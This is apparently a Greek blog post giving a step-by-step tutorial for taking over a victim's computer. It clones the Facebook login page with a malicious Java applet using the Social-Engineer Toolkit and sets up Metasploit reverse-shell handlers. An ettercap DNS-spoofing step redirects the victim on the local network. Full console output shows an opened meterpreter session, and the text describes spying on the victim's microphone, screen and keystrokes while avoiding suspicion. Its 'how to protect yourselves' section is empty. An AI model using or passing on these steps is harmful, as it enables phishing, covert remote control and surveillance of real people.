*ΠΡΟΣΟΧΗ αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε τριτα ατομα χωρις να το γνωριζουν. Δεν φερω καμια ευθυνη αν εφαρμοστει κακοβουλα*
1.Γενικα να προσεχετε σε ποιες σελιδες κανετε εγκατασταση java και επισεις να κοιτατε τον δημιουργο αν λεει uknown και from γραφει ip τοτε μην πατατε run
Τι θα χρειαστειτε;
1.Backtrack 5 R1
- ανοιγουμε το SET θα το βρειτε στο Social Engineer Tools
- επιλεγουμε 1 - Social-Engineering Attacks
- 2 - Website Attack Vectors
- 1 - Java Applet Attack Method
- 2 - Site Cloner
- βαζουμε την σελιδα που θελουμε να κλωνοποιησουμε και να τσιμπισει το θυμα πχ το facebook οποτε γραφω www.facebook.com και μας εμφανιζει αυτο
- [*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: jBcXL2pFDSM
[*] Malicious java applet website prepped for deployment - επιλεγουμε 7 - Windows Meterpreter Reverse_TCP X64 (Connect back to the attacker Windows x64), Meterpreter *μπορειτε να διαλεξετε οτι θελετε απλα το 7 δουλευει σε vista και windows 7
- PORT of the listener [443]: βαζω οτι θελω πχ 4444 η πατατε enter και μπενει η προεπιλεγμενη 443 θυρα
- και σας ανοιγει το metasploit ......
- ***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[--] Apache web server is currently in use for performance. [--]
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 775 exploits - 411 auxiliary - 121 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14417 updated 6 days ago (2011.12.15)
[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.67
LHOST => 192.168.1.67
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (src/program_junk/meta_config)> set ExitOnSession false
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.67
LHOST => 192.168.1.67
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Started reverse handler on 192.168.1.67:8080
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.67:8081
[*] Starting the payload handler... - τωρα το μονο που μενει ειναι να κανουμε το θυμα να ενωθει σε εμας
- οποτε παμε και ανοιγουμε ενα τερματικο και γραφουμε cd /usr/local/share/ettercap/ και μετα nano etter.dns και γραφουμε *.facebook.* A 192.168.1.67 * την ip μας δλδ ετσι
- παταω ctrl+x , y και enter για να το αποθηκευσει
- μετα ανοιγω το ettercap παταω shift+u Network interface : wlan0
- ctrl+s και μετα h και προσθετω σαν target 1 το ρουτερ και target 2 το θυμα
- ctrl+p και επιλεγω dns_spoof
- ctrl+w και περιμενω να δω αυτο
- [*] Sending stage (946176 bytes) to 192.168.1.73
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.73:63608) at 2011-12-21 17:29:06 +0200 - παταω enter και γραφω sessions -i 1 * σταματαω το mitm attack του ettercap και το κλεινω
- και ειμαστε ετοιμοι.... εχουμε εισβαλει *αν γραψουμε help θα μας εμφανισει εντολες που μπορουμε να γραψουμε οπως να ακουω απο το μικροφωνο του θυματος να βλεπω την επιφανεια εργασιας του,να γραφω τα πληκτρα που παταει κτλ
- Το θυμα μας οταν παει να μπει στο facebook θα του εμφανιστει αυτο
- θα πατησει run και θα μας ''ανοιξει την πορτα να εισβαλουμε'' χωρις να καταλαβει τι εγινε .....απλα μετα πατηστε στο ettercap stop mitm attack για να μην κινησεις υποψια.
Πως θα προστατευτειτε;
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου